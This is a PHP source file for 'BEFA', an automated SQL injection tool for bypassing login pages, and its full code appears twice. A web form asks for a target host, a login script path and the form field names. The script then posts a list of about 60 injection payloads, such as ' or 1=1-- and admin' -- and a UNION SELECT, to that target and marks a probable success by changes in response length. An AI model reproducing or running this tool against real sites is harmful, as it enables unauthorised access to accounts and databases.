RedToor/befa.php

## befa.php
<?php
/*
   Coder  : [f][t] \ RedToor
   Project: BEFA [Bypass Head for authentication]
   Date 1 : 11/08/2014 Vs 1
   Date 2 : 11/19/2014 Vs 2
   Date 3 : 10/18/2016 Vs 3

   	how it works

                  www.target.com
                        /
            www.target.com/admin/login.php ->  <form name="form" action="verify.php" method="post">
            								    User <input type="text" name="username">
            									Pass <input type="text" name="password">
            									<input type="submit" value="login"></form>
            									      /
            						www.target.com/admin/verify.php [username&password]
            						                /
            				POST /admin/verify.php HTTP/1.1
   						    Host: www.target.com
   							Content-Type: application/x-www-form-urlencoded
	                        Content-Length: number of letters
    						username={payload}&password=password{payload}
    							              /
										verify.php
    							       		/
			MYSQL -> "SELECT * FROM users WHERE username='{payload}' AND password='{payload}'"
    									  /
    							  RESULT (YES) (NO)

*/

error_reporting(0);


// Data
$HOST=$_POST['HOST'];
$URL=$_POST['URL'];
$DATA1=$_POST['DATA1'];
$DATA2=$_POST['DATA2'];
$DATA3=$_POST['DATA3'];
$DATA4=$_POST['DATA4'];
$TYPE=$_POST['TYPE'];

if (empty($HOST))
{
?>
	<!-- Script by RedToor -->
	<title>Befa By RedToor</title>
	<table width="100%" border="0" height="100%" cellspacing="0">
	<td valign="middle">
	<div align="center">
	<OBJECT classid>
	<h1><font style="font-family: fantasy">Bypass Head for authentication</font></h1>
	<form method="POST" action="<?php echo $_SERVER['PHP_SELF'] ?>"><pre>


      HOST  : <input type="text" name="HOST"  placeholder="www.target.com"    > As www.target.com 	.
      PATH  : <input type="text" name="URL"   placeholder="admin/verify.php"  > As admin/login.php 	.
INPUT NAME  : <input type="text" name="DATA1" placeholder="username"          > As user 		.
INPUT NAME 2: <input type="text" name="DATA2" placeholder="passwd"            > As pass 		.
INPUT NAME 3: <input type="text" name="DATA3" placeholder="other" size="7">=<input type="text" name="DATA4" placeholder="value" size="7"> As other [If need]	.

so user=[payload]&pass=[payload]&other=value

METHOD: POST<input type="radio" name="TYPE" value="POST" checked="checked"> GET<input type="radio" name="TYPE" value="GET">
<br><input type="submit" value="Start"></form>
	</pre>
<?php
}else{

// ----------------------------------------------------------- Payloads
$payload=array(
			"test",
			"0' or 0=0'#",
	        "' or ''='",
	        "' or ''=''",
	        "0' or '0'=0'#",
	        "0' or ''='#",
	        "' or ''='#",
	        "1' or '1'=1'#",
	        "1'1",
	        "1 EXEC SP_ (or EXEC XP_)",
	        "1 AND 1=1",
			"or 1=1",
			"or 1=1--",
			"or 1=1#",
			"or 1=1/*",
			"admin",
			"admin' --",
			"admin' #",
			"admin'/*",
			"admin' or '1'='1",
			"admin' or '1'='1'--",
			"admin' or '1'='1'#",
			"admin' or '1'='1'/*",
			"admin' or 1=1 or ''='",
			"admin' or 1=1",
			"admin' or 1=1--",
			"admin' or 1=1#",
			"admin' or 1=1/*",
			"admin') or ('1'='1",
			"admin') or ('1'='1'--",
			"admin') or ('1'='1'#",
			"admin') or ('1'='1'/*",
			"admin') or '1'='1",
			"admin') or '1'='1'--",
			"admin') or '1'='1'#",
			"admin') or '1'='1'/*",
			"1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",
			"admin\" --",
			"admin\" #",
			"admin\"/*",
			"admin\" or \"1\"=\"1\"",
			"admin\" or \"1\"=\"1\"--\"",
			"admin\" or \"1\"=\"1\"#",
			"admin\" or \"1\"=\"1\"/*",
			"admin\"or 1=1 or \"\"=\"",
			"admin\" or 1=1",
			"admin\" or 1=1--",
			"admin\" or 1=1#",
			"admin\" or 1=1/*",
			"admin\") or (\"1\"=\"1",
			"admin\") or (\"1\"=\"1\"--",
			"admin\") or (\"1\"=\"1\"#",
			"admin\") or (\"1\"=\"1\"/*",
			"admin\") or \"1\"=\"1\"",
			"admin\") or \"1\"=\"1\"--",
			"admin\") or \"1\"=\"1\"#",
			"admin\") or \"1\"=\"1\"/*",
			"1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055",
	         );
// ----------------------------------------------------------- Payloads


$ver=strpos($HOST, "http://");
if($ver===false){}else{$HOST=str_replace("http://", "", $HOST);$HOST=str_replace("/", "", $HOST);}
print '<br><title>Befa By RedToor</title><center><h3><font style="font-family: fantasy">B.E.F.A</font></h3></center><div align="center">';

if($TYPE=="POST"){$TYPE="application/x-www-form-urlencoded";$METHOD="POST";}else{$TYPE="text/html";$METHOD="GET";}
echo '<table border="2px"> <tr>
              <td>Payload</td>
              <td>Lentgh</td>
              <td>Probability</td>
	</tr>';
$check=0;
$last_fail=0;
foreach ($payload as $pay) {
	$inputs = http_build_query(
					array(
			        ''.$DATA1.'' => $pay,
			        ''.$DATA2.'' => $pay,
			        ''.$DATA3.'' => $DATA4
					    )
					);
	$payloads = array('http' =>
					array(
	        			'method'  => $METHOD,
	        			'header'  => "Content-type: ".$TYPE,
	        			'content' => $inputs
					)
				);

	$context = stream_context_create($payloads);
	$request = file_get_contents("http://".$HOST."/".$URL, false, $context);
	if ($check!=strlen(utf8_decode($request)) and $last_fail!=strlen(utf8_decode($request))){$status="<i>YES</i>";$last_fail=$check;}else{$status="NO";}
	if ($pay!="test"){
		echo "<tr><td>".$pay."</td>";
		echo "<td>".strlen(utf8_decode($request))."</td>";
		echo "<td>".$status."</td></tr>";
		}
		$check = strlen(utf8_decode($request));
	}echo "</table>";
}
?>
	<?php
	/*
	Coder : [f][t] \ RedToor
	Project: BEFA [Bypass Head for authentication]
	Date 1 : 11/08/2014 Vs 1
	Date 2 : 11/19/2014 Vs 2
	Date 3 : 10/18/2016 Vs 3

	how it works

	www.target.com
	/
	www.target.com/admin/login.php -> <form name="form" action="verify.php" method="post">
	User <input type="text" name="username">
	Pass <input type="text" name="password">
	<input type="submit" value="login"></form>
	/
	www.target.com/admin/verify.php [username&password]
	/
	POST /admin/verify.php HTTP/1.1
	Host: www.target.com
	Content-Type: application/x-www-form-urlencoded
	Content-Length: number of letters
	username={payload}&password=password{payload}
	/
	verify.php
	/
	MYSQL -> "SELECT * FROM users WHERE username='{payload}' AND password='{payload}'"
	/
	RESULT (YES) (NO)

	*/

	error_reporting(0);


	// Data
	$HOST=$_POST['HOST'];
	$URL=$_POST['URL'];
	$DATA1=$_POST['DATA1'];
	$DATA2=$_POST['DATA2'];
	$DATA3=$_POST['DATA3'];
	$DATA4=$_POST['DATA4'];
	$TYPE=$_POST['TYPE'];

	if (empty($HOST))
	{
	?>
	<!-- Script by RedToor -->
	<title>Befa By RedToor</title>
	<table width="100%" border="0" height="100%" cellspacing="0">
	<td valign="middle">
	<div align="center">
	<OBJECT classid>
	<h1><font style="font-family: fantasy">Bypass Head for authentication</font></h1>
	<form method="POST" action="<?php echo $_SERVER['PHP_SELF'] ?>"><pre>


	HOST : <input type="text" name="HOST" placeholder="www.target.com" > As www.target.com .
	PATH : <input type="text" name="URL" placeholder="admin/verify.php" > As admin/login.php .
	INPUT NAME : <input type="text" name="DATA1" placeholder="username" > As user .
	INPUT NAME 2: <input type="text" name="DATA2" placeholder="passwd" > As pass .
	INPUT NAME 3: <input type="text" name="DATA3" placeholder="other" size="7">=<input type="text" name="DATA4" placeholder="value" size="7"> As other [If need] .

	so user=[payload]&pass=[payload]&other=value

	METHOD: POST<input type="radio" name="TYPE" value="POST" checked="checked"> GET<input type="radio" name="TYPE" value="GET">
	<br><input type="submit" value="Start"></form>
	</pre>
	<?php
	}else{

	// ----------------------------------------------------------- Payloads
	$payload=array(
	"test",
	"0' or 0=0'#",
	"' or ''='",
	"' or ''=''",
	"0' or '0'=0'#",
	"0' or ''='#",
	"' or ''='#",
	"1' or '1'=1'#",
	"1'1",
	"1 EXEC SP_ (or EXEC XP_)",
	"1 AND 1=1",
	"or 1=1",
	"or 1=1--",
	"or 1=1#",
	"or 1=1/*",
	"admin",
	"admin' --",
	"admin' #",
	"admin'/*",
	"admin' or '1'='1",
	"admin' or '1'='1'--",
	"admin' or '1'='1'#",
	"admin' or '1'='1'/*",
	"admin' or 1=1 or ''='",
	"admin' or 1=1",
	"admin' or 1=1--",
	"admin' or 1=1#",
	"admin' or 1=1/*",
	"admin') or ('1'='1",
	"admin') or ('1'='1'--",
	"admin') or ('1'='1'#",
	"admin') or ('1'='1'/*",
	"admin') or '1'='1",
	"admin') or '1'='1'--",
	"admin') or '1'='1'#",
	"admin') or '1'='1'/*",
	"1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",
	"admin\" --",
	"admin\" #",
	"admin\"/*",
	"admin\" or \"1\"=\"1\"",
	"admin\" or \"1\"=\"1\"--\"",
	"admin\" or \"1\"=\"1\"#",
	"admin\" or \"1\"=\"1\"/*",
	"admin\"or 1=1 or \"\"=\"",
	"admin\" or 1=1",
	"admin\" or 1=1--",
	"admin\" or 1=1#",
	"admin\" or 1=1/*",
	"admin\") or (\"1\"=\"1",
	"admin\") or (\"1\"=\"1\"--",
	"admin\") or (\"1\"=\"1\"#",
	"admin\") or (\"1\"=\"1\"/*",
	"admin\") or \"1\"=\"1\"",
	"admin\") or \"1\"=\"1\"--",
	"admin\") or \"1\"=\"1\"#",
	"admin\") or \"1\"=\"1\"/*",
	"1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055",
	);
	// ----------------------------------------------------------- Payloads


	$ver=strpos($HOST, "http://");
	if($ver===false){}else{$HOST=str_replace("http://", "", $HOST);$HOST=str_replace("/", "", $HOST);}
	print '<br><title>Befa By RedToor</title><center><h3><font style="font-family: fantasy">B.E.F.A</font></h3></center><div align="center">';

	if($TYPE=="POST"){$TYPE="application/x-www-form-urlencoded";$METHOD="POST";}else{$TYPE="text/html";$METHOD="GET";}
	echo '<table border="2px"> <tr>
	<td>Payload</td>
	<td>Lentgh</td>
	<td>Probability</td>
	</tr>';
	$check=0;
	$last_fail=0;
	foreach ($payload as $pay) {
	$inputs = http_build_query(
	array(
	''.$DATA1.'' => $pay,
	''.$DATA2.'' => $pay,
	''.$DATA3.'' => $DATA4
	)
	);
	$payloads = array('http' =>
	array(
	'method' => $METHOD,
	'header' => "Content-type: ".$TYPE,
	'content' => $inputs
	)
	);

	$context = stream_context_create($payloads);
	$request = file_get_contents("http://".$HOST."/".$URL, false, $context);
	if ($check!=strlen(utf8_decode($request)) and $last_fail!=strlen(utf8_decode($request))){$status="<i>YES</i>";$last_fail=$check;}else{$status="NO";}
	if ($pay!="test"){
	echo "<tr><td>".$pay."</td>";
	echo "<td>".strlen(utf8_decode($request))."</td>";
	echo "<td>".$status."</td></tr>";
	}
	$check = strlen(utf8_decode($request));
	}echo "</table>";
	}
	?>